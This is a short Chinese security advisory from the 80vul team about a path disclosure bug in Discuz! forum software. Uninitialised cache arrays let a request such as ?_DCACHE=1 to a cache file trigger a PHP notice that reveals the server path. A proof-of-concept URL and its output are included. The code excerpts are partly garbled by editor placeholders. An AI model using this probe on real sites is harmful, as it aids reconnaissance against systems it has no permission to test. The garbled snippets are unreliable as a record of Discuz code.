|
Discuz! 路径信息泄露 bug
author: 80vul-A
team:http://www.80vul.com
一 分析
目录\uc_client\data\cache\,\forumdata\cache等下面的文件里对如:
___FCKpd___0
CACHE['settings'] = array (
'accessemail' => '',
'censoremail' => '',
'censorusername' => '',
'dateformat' => 'y-n-j',
'doublee' => '1',
'nextnotetime' => '0',
'timeoffset' => '28800',
);
___FCKpd___0
DCACHE['settings'] = array (
'accessemail' => '',
'adminipaccess' => '',
'admode' => '1',
'archiverstatus' => '1',
'attachbanperiods' => '',
'attachimgpost' => '1',
数组___FCKpd___0
DCACHE,___FCKpd___0
CACHE等没有初始化,其实dz的安全人员已经考虑到了这个问题,如在include\common.inc.php
___FCKpd___0
DCOOKIE = ___FCKpd___0
DSESSION = ___FCKpd___0
DCACHE = ___FCKpd___0
DPLUGIN = $advlist = array();
但是想对于独立的Discuz! cache file并没有初始化,当我们提交?_CACHE=1 或者_DCACHE=2 导致错误而暴露路径等信息.
二 利用
poc如:
http://www.80vul.com/bbs/forumdata/cache/cache_usergroups.php?_DCACHE=1
Notice: Array to string conversion in xxx\forumdata\cache\cache_usergroups.php on line 6
三 补丁[fix]
等待官方补丁.
|
推荐
评论(0条)
